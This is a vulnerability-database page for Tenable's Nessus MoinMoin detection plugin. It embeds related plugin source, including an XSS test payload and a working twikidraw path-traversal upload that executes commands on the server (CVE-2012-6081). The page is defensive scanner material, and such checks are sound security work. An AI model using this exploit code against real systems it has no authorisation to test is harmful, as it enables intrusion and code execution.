Search...

MoinMoin Detection

2010-02-02T00:00:00

ID MOINMOIN_DETECT.NASL
Type nessus
Reporter This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2021-03-02T00:00:00

Description

The remote host is running MoinMoin, a wiki written in Python.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#


include("compat.inc");


if (description)
{
  script_id(44382);
  script_version("1.4");
  script_cvs_date("Date: 2019/11/22");

  script_name(english:"MoinMoin Detection");
  script_summary(english:"Looks for evidence of MoinMoin");

  script_set_attribute(attribute:"synopsis", value:"The remote web server is hosting a wiki written in Python.");
  script_set_attribute(attribute:"description", value:"The remote host is running MoinMoin, a wiki written in Python.");
  script_set_attribute(attribute:"see_also", value:"http://www.moinmo.in/");
  script_set_attribute(attribute:"solution", value:"n/a");
  script_set_attribute(attribute:"risk_factor", value:"None");

  script_set_attribute(attribute:"plugin_publication_date",value:"2010/02/02");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:moinmo:moinmoin");
  script_set_attribute(attribute:"asset_inventory", value:"True");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");

port = get_http_port(default:80);

dirs = cgi_dirs();
if (thorough_tests)
{
  dirs = make_list(dirs, '/wiki', '/moin.cgi', '/moinmoin');
  dirs = list_uniq(dirs);
}

checks = make_array();

regexes = make_list();
regexes[0] = make_list("MoinMoin(&lt;\/a&gt;)? Version&lt;");
regexes[1] = make_list("&lt;dd&gt;Release (.+) \[Revision");
checks["/SystemInfo"] = regexes;

installs = find_install(
  appname : "moinmoin",
  checks  : checks,
  dirs    : dirs,
  port    : port
);
if (isnull(installs)) audit(AUDIT_WEB_APP_NOT_INST, "MoinMoin", port);

report = NULL;
if (report_verbosity &gt; 0)
{
  report = get_install_report(
    display_name : "MoinMoin",
    installs     : installs,
    port         : port
  );
  security_note(port:port, extra:report);
}
else security_note(port);

JSON Vulners Source

Initial Source

{"naslFamily": "CGI abuses", "id": "MOINMOIN_DETECT.NASL", "lastseen": "2021-03-01T04:08:04", "viewCount": 440, "bulletinFamily": "scanner", "cpe": ["cpe:/a:moinmo:moinmoin"], "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 21, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["MOINMOIN_COOKIE_ID.NASL", "MOINMOIN_TWIKIDRAW_CODE_EXEC.NASL", "MOINMOIN_PAGEEDITOR_XSS.NASL", "MOINMOIN_ARGV_INFO_DISCLOSURE.NASL", "MOINMOIN_1_9_6.NASL", "MOINMOIN_RSSLINK_XSS.NASL"]}], "modified": "2021-03-01T04:08:04", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-03-01T04:08:04", "rev": 2}, "vulnersScore": -0.3}, "type": "nessus", "description": "The remote host is running MoinMoin, a wiki written in Python.", "title": "MoinMoin Detection", "cvelist": [], "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44382);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_name(english:\"MoinMoin Detection\");\n script_summary(english:\"Looks for evidence of MoinMoin\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote web server is hosting a wiki written in Python.\");\n script_set_attribute(attribute:\"description\", value:\"The remote host is running MoinMoin, a wiki written in Python.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.moinmo.in/\");\n script_set_attribute(attribute:\"solution\", value:\"n/a\");\n script_set_attribute(attribute:\"risk_factor\", value:\"None\");\n\n script_set_attribute(attribute:\"plugin_publication_date\",value:\"2010/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_set_attribute(attribute:\"asset_inventory\", value:\"True\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80);\n\ndirs = cgi_dirs();\nif (thorough_tests)\n{\n dirs = make_list(dirs, '/wiki', '/moin.cgi', '/moinmoin');\n dirs = list_uniq(dirs);\n}\n\nchecks = make_array();\n\nregexes = make_list();\nregexes[0] = make_list(\"MoinMoin(<\\/a>)? Version<\");\nregexes[1] = make_list(\"<dd>Release (.+) \\[Revision\");\nchecks[\"/SystemInfo\"] = regexes;\n\ninstalls = find_install(\n appname : \"moinmoin\",\n checks : checks,\n dirs : dirs,\n port : port\n);\nif (isnull(installs)) audit(AUDIT_WEB_APP_NOT_INST, \"MoinMoin\", port);\n\nreport = NULL;\nif (report_verbosity > 0)\n{\n report = get_install_report(\n display_name : \"MoinMoin\",\n installs : installs,\n port : port\n );\n security_note(port:port, extra:report);\n}\nelse security_note(port);\n\n", "published": "2010-02-02T00:00:00", "pluginID": "44382", "references": ["http://www.moinmo.in/"], "reporter": "This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "modified": "2021-03-02T00:00:00", "href": "https://www.tenable.com/plugins/nessus/44382", "scheme": null}

{"nessus": [{"lastseen": "2021-01-20T12:09:09", "description": "The MoinMoin install hosted on the remote web server fails to properly\nsanitize user-supplied input in the 'page_name' parameter when creating\nan rss link. An attacker may be able to leverage this issue to inject\narbitrary HTML and script code into a user's browser to be executed\nwithin the security context of the affected site. \n\nNote that the application is also reportedly affected by a directory\ntraversal vulnerability (CVE-2012-6080) as well as a remote code\nexecution vulnerability (CVE-2012-6081). Nessus has not, however,\ntested for these additional issues.", "edition": 25, "published": "2013-02-28T00:00:00", "title": "MoinMoin rsslink() Function page_name Parameter XSS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6080", "CVE-2012-6081"], "modified": "2013-02-28T00:00:00", "cpe": ["cpe:/a:moinmo:moinmoin"], "id": "MOINMOIN_RSSLINK_XSS.NASL", "href": "https://www.tenable.com/plugins/nessus/64931", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64931);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-6082\");\n script_bugtraq_id(57089);\n\n script_name(english:\"MoinMoin rsslink() Function page_name Parameter XSS\");\n script_summary(english:\"Attempts a non-persistent XSS\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A wiki application on the remote web server is affected by a cross-\nsite scripting vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The MoinMoin install hosted on the remote web server fails to properly\nsanitize user-supplied input in the 'page_name' parameter when creating\nan rss link. An attacker may be able to leverage this issue to inject\narbitrary HTML and script code into a user's browser to be executed\nwithin the security context of the affected site. \n\nNote that the application is also reportedly affected by a directory\ntraversal vulnerability (CVE-2012-6080) as well as a remote code\nexecution vulnerability (CVE-2012-6081). Nessus has not, however,\ntested for these additional issues.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/SecurityFixes\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 1.9.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"moinmoin_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/moinmoin\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(\n appname:\"moinmoin\",\n port:port,\n exit_on_fail:TRUE\n);\n\ndir = install[\"dir\"];\ninstall_url = build_url(qs:dir, port:port);\n\nxss_test = '\"><script>alert(\"' + (SCRIPT_NAME - \".nasl\") + '-' + unixtime() +\n '\")</script>';\n\nres = http_send_recv3(\n method : \"GET\",\n item : dir + \"/\" + xss_test,\n port : port,\n exit_on_fail : TRUE,\n fetch404 : TRUE\n);\n\nif (\n \">MoinMoin Powered</a>\" >< res[2] &&\n xss_test + '\" href=\"' >< res[2]\n)\n{\n output = extract_pattern_from_resp(string:res[2], pattern:'ST:'+xss_test);\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\nNessus was able to verify the issue exists using the following URL :' +\n '\\n' +\n '\\n' + install_url + xss_test +\n '\\n';\n if (report_verbosity > 1)\n {\n snip = crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30);\n report +=\n '\\n' + 'This produced the following response :' +\n '\\n' +\n '\\n' + snip +\n '\\n' + chomp(output) +\n '\\n' + snip +\n '\\n';\n }\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"MoinMoin\", install_url);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-20T12:09:08", "description": "According to its version number, the MoinMoin install hosted on the\nremote web server is affected by multiple vulnerabilities:\n\n - Versions 1.9.3 up to 1.9.5 are affected by a directory\n traversal vulnerability because the _do_attachment_move\n action in 'AttachFile.py' does not properly sanitize\n user-supplied input. This could allow an\n unauthenticated, remote attacker to upload and\n overwrite arbitrary files on the remote host.\n (CVE-2012-6080)\n\n - Versions 1.9.x up to 1.9.5 are affected by a remote\n code execution vulnerability because the 'twikidraw.py'\n action fails to properly sanitize user-supplied input.\n A remote, unauthenticated attacker could utilize a\n specially crafted request using directory traversal\n style characters to upload a file containing arbitrary\n code to the remote host. An attacker could then execute\n the code with the privileges of the user that runs the\n MoinMoin process. (CVE-2012-6081)\n\n - Version 1.9.5 is affected by a cross-site scripting\n (XSS) vulnerability because the application fails to\n properly sanitize user-supplied input in the 'page_name'\n parameter when creating an rss link. An attacker could\n leverage this issue to inject arbitrary HTML and script\n code into a user's browser to be executed within the\n security context of the affected site. (CVE-2012-6082)\n\n - Versions < 1.9.x are not maintained by MoinMoin\n developers and should be considered vulnerable.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 27, "published": "2013-02-28T00:00:00", "title": "MoinMoin < 1.9.6 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6080", "CVE-2012-6081"], "modified": "2013-02-28T00:00:00", "cpe": ["cpe:/a:moinmo:moinmoin"], "id": "MOINMOIN_1_9_6.NASL", "href": "https://www.tenable.com/plugins/nessus/64930", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64930);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-6080\", \"CVE-2012-6081\", \"CVE-2012-6082\");\n script_bugtraq_id(\n 57076,\n 57082,\n 57089,\n 57147\n );\n\n script_name(english:\"MoinMoin < 1.9.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of MoinMoin\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A wiki application on the remote web server is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the MoinMoin install hosted on the\nremote web server is affected by multiple vulnerabilities:\n\n - Versions 1.9.3 up to 1.9.5 are affected by a directory\n traversal vulnerability because the _do_attachment_move\n action in 'AttachFile.py' does not properly sanitize\n user-supplied input. This could allow an\n unauthenticated, remote attacker to upload and\n overwrite arbitrary files on the remote host.\n (CVE-2012-6080)\n\n - Versions 1.9.x up to 1.9.5 are affected by a remote\n code execution vulnerability because the 'twikidraw.py'\n action fails to properly sanitize user-supplied input.\n A remote, unauthenticated attacker could utilize a\n specially crafted request using directory traversal\n style characters to upload a file containing arbitrary\n code to the remote host. An attacker could then execute\n the code with the privileges of the user that runs the\n MoinMoin process. (CVE-2012-6081)\n\n - Version 1.9.5 is affected by a cross-site scripting\n (XSS) vulnerability because the application fails to\n properly sanitize user-supplied input in the 'page_name'\n parameter when creating an rss link. An attacker could\n leverage this issue to inject arbitrary HTML and script\n code into a user's browser to be executed within the\n security context of the affected site. (CVE-2012-6082)\n\n - Versions < 1.9.x are not maintained by MoinMoin\n developers and should be considered vulnerable.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/SecurityFixes\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 1.9.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-6080\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MoinMoin 1.9.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MoinMoin twikidraw Action Traversal File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/28\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"moinmoin_detect.nasl\");\n script_require_keys(\"www/moinmoin\", \"Settings/ParanoidReport\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(\n appname:\"moinmoin\",\n port:port,\n exit_on_fail:TRUE\n);\n\ndir = install[\"dir\"];\nversion = install[\"ver\"];\ninstall_url = build_url(qs:dir, port:port);\n\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, \"MoinMoin\", install_url);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nver = split(version, sep:\".\", keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n# Versions less than 1.9.6 are vulnerable\n# http://moinmo.in/SecurityFixes notes that versions < 1.9.x are no longer\n# maintained and should be considered vulnerable\nif (\n ver[0] < 1 ||\n (ver[0] == 1 && ver[1] < 9) ||\n (ver[0] == 1 && ver[1] == 9 && ver[2] < 6)\n)\n{\n set_kb_item(name:\"www/\"+port+\"/XSS\", value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_url+\n '\\n Installed version : ' +version+\n '\\n Fixed version : 1.9.6\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"MoinMoin\", install_url, version);\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-20T12:09:09", "description": "The MoinMoin install hosted on the remote web server fails to properly\nsanitize user-supplied input in the twikidraw (action/twikidraw.py)\naction. A remote, unauthenticated attacker could utilize a specially\ncrafted request using directory traversal style characters to upload a\nfile containing arbitrary code to the remote host. An attacker could\nthen execute the code with the privileges of the user that runs the\nMoinMoin process. Successful exploitation requires that the MoinMoin\nplugin directory has write permission set for the MoinMoin server user. \n\nNote that the 'anywikidraw' action is reportedly also affected by the\ndirectory traversal and code execution vulnerabilities. The application\nis also reportedly affected by an additional directory traversal\nvulnerability in the action/AttachFile.py script (CVE-2012-6080) as well\nas a cross-site scripting (XSS) vulnerability when creating an rss link\n(CVE-2012-6082). Nessus has not, however, tested for these additional\nissues.", "edition": 27, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2013-01-21T00:00:00", "title": "MoinMoin twikidraw.py Traversal File Upload Arbitrary File Overwrite", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6495", "CVE-2012-6080", "CVE-2012-6081"], "modified": "2013-01-21T00:00:00", "cpe": ["cpe:/a:moinmo:moinmoin"], "id": "MOINMOIN_TWIKIDRAW_CODE_EXEC.NASL", "href": "https://www.tenable.com/plugins/nessus/63638", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63638);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-6081\", \"CVE-2012-6495\");\n script_bugtraq_id(57082, 57147);\n script_xref(name:\"EDB-ID\", value:\"25304\");\n\n script_name(english:\"MoinMoin twikidraw.py Traversal File Upload Arbitrary File Overwrite\");\n script_summary(english:\"Attempts to execute arbitrary code\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A wiki application on the remote web server is affected by a code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The MoinMoin install hosted on the remote web server fails to properly\nsanitize user-supplied input in the twikidraw (action/twikidraw.py)\naction. A remote, unauthenticated attacker could utilize a specially\ncrafted request using directory traversal style characters to upload a\nfile containing arbitrary code to the remote host. An attacker could\nthen execute the code with the privileges of the user that runs the\nMoinMoin process. Successful exploitation requires that the MoinMoin\nplugin directory has write permission set for the MoinMoin server user. \n\nNote that the 'anywikidraw' action is reportedly also affected by the\ndirectory traversal and code execution vulnerabilities. The application\nis also reportedly affected by an additional directory traversal\nvulnerability in the action/AttachFile.py script (CVE-2012-6080) as well\nas a cross-site scripting (XSS) vulnerability when creating an rss link\n(CVE-2012-6082). Nessus has not, however, tested for these additional\nissues.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/SecurityFixes\");\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/SecurityFixes/CVE-2012-6081\");\n # http://www.h-online.com/security/news/item/Hackers-gain-access-to-all-edu-domains-1858471.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1f8ddc57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 1.9.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-6495\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MoinMoin 1.9.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MoinMoin twikidraw Action Traversal File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"moinmoin_detect.nasl\");\n script_require_keys(\"www/moinmoin\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(\n appname:\"moinmoin\",\n port:port,\n exit_on_fail:TRUE\n);\n\ndir = install[\"dir\"];\ninstall_url = build_url(qs:dir, port:port);\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig /all';\n else cmd = 'id';\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig /all');\n\ncmd_pats = make_array();\ncmd_pats['id'] = \"uid=[0-9]+.*gid=[0-9]+.*\";\ncmd_pats['ipconfig /all'] = \"Subnet Mask\";\n\n\n# Check permissions on WikiSandBox page\nres = http_send_recv3(\n method : \"GET\",\n item : dir + \"/WikiSandBox\",\n port : port,\n exit_on_fail : TRUE\n);\n\nif (\"Edit (Text)\" >!< res[2] || \"Edit (GUI)\" >!< res[2])\n exit(0, \"Authentication is required to test the\" + \"MoinMoin install at \" + install_url + \".\");\n\n# Grab a ticket hash needed for the exploit\nurl = \"/WikiSandBox?action=twikidraw&do=modify&target=../../../../data/plugin/action/nessus.py\";\n\nres = http_send_recv3(\n method : \"GET\",\n item : dir + url,\n port : port,\n exit_on_fail : TRUE\n);\n\n# Versions 1.9.x < 1.9.2 do not use a ticket hash\n# Versions 1.9.2 and up do require this value\npat = \"&ticket=(.+)&\";\nmatch = eregmatch(pattern:pat, string:res[2]);\nif (!isnull(match)) ticket = match[1];\nelse ticket = \"\";\n\n# Check for escaping in versions >= 1.9.6 which indicate a non-affected instance\npat2 = 'param name=\"basename\" value=\"(.._)+';\nmatch2 = eregmatch(pattern:pat2, string:res[2]);\nif (!isnull(match2))\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"MoinMoin\", install_url);\n\n# variables for our loop\nvuln = FALSE;\nvuln2 = FALSE;\n\nforeach cmd (cmds)\n{\n script = (SCRIPT_NAME - \".nasl\");\n script = str_replace(string:script, find:\"_\", replace:\"\");\n exp_script = script + unixtime() + \".py\";\n\n # Define our exploits\n # Unix exploit\n unix_exploit = '--89692781418184\\nContent-Disposition: form-data;' +\n ' name=\"filename\"\\n\\ndrawing.r if()else[]\\nimport os\\ndef execute(p,r):' +\n 'exec\"print>>r,os\\\\56popen(' + \"'\" + cmd + \"&&pwd'\" + \")\\56read()\" +\n '\"\\n--89692781418184\\nContent-Disposition: form-data; name=\"filepath\"; ' +\n 'filename=\"drawing.png\"\\nContent-Type: image/png\\n\\nMoinMoin error' +\n '\\n\\n--89692781418184--';\n\n # Windows exploit\n win_exploit = '--89692781418184\\nContent-Disposition: form-data; ' +\n 'name=\"filename\"\\n\\n\"\\n--89692781418184\\nContent-Disposition: form-data;' +\n ' name=\"filepath\"; filename=\"drawing.png\"\\nContent-Type: image/png\\n\\n' +\n 'MoinMoin error\\ndrawing.r if()else[]\\nimport os\\ndef execute(p,r):exec\"' +\n 'print>>r,os\\\\56popen(' + \"'\" + cmd + \"&& dir'\" + \")\\56read()\" +\n '\"\\n\\n--89692781418184--';\n\n if (cmd == 'id') exploit = unix_exploit;\n else exploit = win_exploit;\n\n # Upload our file\n url = \"?action=twikidraw&do=save&ticket=\" + ticket +\n \"&target=../../../../data/plugin/action/\" + exp_script;\n\n res = http_send_recv3(\n method : \"POST\",\n item : dir + \"/WikiSandBox\" + url,\n add_headers : make_array(\"Content-Type\",\n \"multipart/form-data; boundary=89692781418184\"),\n data : exploit,\n port : port,\n exit_on_fail : TRUE\n );\n exp_request = http_last_sent_request();\n upload = res[2];\n\n # Test code execution with our uploaded file\n check_url = \"/WikiSandBox?action=\" + (exp_script - \".py\");\n res = http_send_recv3(\n method : \"GET\",\n item : dir + check_url,\n port : port,\n exit_on_fail : TRUE\n );\n\n # Extract path for reporting. /data/plugin/action is where upload will reside\n if (cmd == 'id')\n {\n get_path = strstr(res[2], \"/\");\n get_up_path = chomp(get_path) + \"/data/plugin/action/\" + script + \"*\";\n\n output = strstr(res[2], \"uid\") - get_path;\n }\n else\n {\n get_path = strstr(res[2], \"Volume in drive\");\n get_dir = egrep(pattern:\"Directory of (.+)\", string:get_path);\n get_up_path = chomp((get_dir - \" Directory of \")) + \"\\data\\plugin\\action\\\"+\n script + \"*\";\n\n output = strstr(res[2], \"Windows IP\") - get_path;\n }\n\n match = egrep(pattern:cmd_pats[cmd], string:res[2]);\n\n\n # For CGI installs, plugins are activated on the next request\n if (match)\n {\n vuln = TRUE;\n break;\n }\n # For the standalone or twisted servers, plugins are activated after\n # restarting the MoinMoin server.\n # For FastCGI and mod_python, Apache needs a restart for exploit to work.\n else if (\n (isnull(upload)) &&\n (!vuln) &&\n (\"<h1>Unhandled Exception</h1>\" >!< res[2])\n )\n {\n vuln2 = TRUE;\n break;\n }\n}\n\n# Exit if upload and/or attack fail\nif ((!vuln) && (!vuln2))\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"MoinMoin\", install_url);\n\n# Reporting\nif (report_verbosity > 0)\n{\n snip = crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30);\n\n # Reporting for successful exploit\n if (vuln)\n {\n report =\n '\\nNessus was able to verify the issue exists using the following request :' +\n '\\n' +\n '\\n' + install_url + check_url +\n '\\n' +\n '\\nNote: This file has not been removed by Nessus and will need to be' +\n '\\nmanually deleted (' + get_up_path + ').' +\n '\\n';\n if (report_verbosity > 1)\n {\n report +=\n '\\nThis file was uploaded using the following request :' +\n '\\n' +\n '\\n' + snip +\n '\\n' + exp_request +\n '\\n' + snip +\n '\\n' +\n '\\n' + 'The file uploaded by Nessus executed the command \"'+cmd+ '\"' +\n '\\nwhich produced the following output :' +\n '\\n' +\n '\\n' + snip +\n '\\n' + chomp(output) +\n '\\n' + snip +\n '\\n';\n }\n }\n # Reporting for successful upload, but attack would require a server restart\n # in order for plugin to be activated\n else if (vuln2)\n {\n report =\n '\\nNessus was able to upload a file to the remote host, however cannot' +\n '\\nverify the issue exists until the web server has been restarted.' +\n '\\nTo test the issue after restarting your webserver, you can use the' +\n '\\nfollowing URL to verify the exploit :' +\n '\\n' +\n '\\n' + install_url + check_url +\n '\\n' +\n '\\nNote that this file has not been removed by Nessus and will need to' +\n '\\nbe manually deleted (/data/plugin/action/' + script + '*).' +\n '\\n';\n if (report_verbosity > 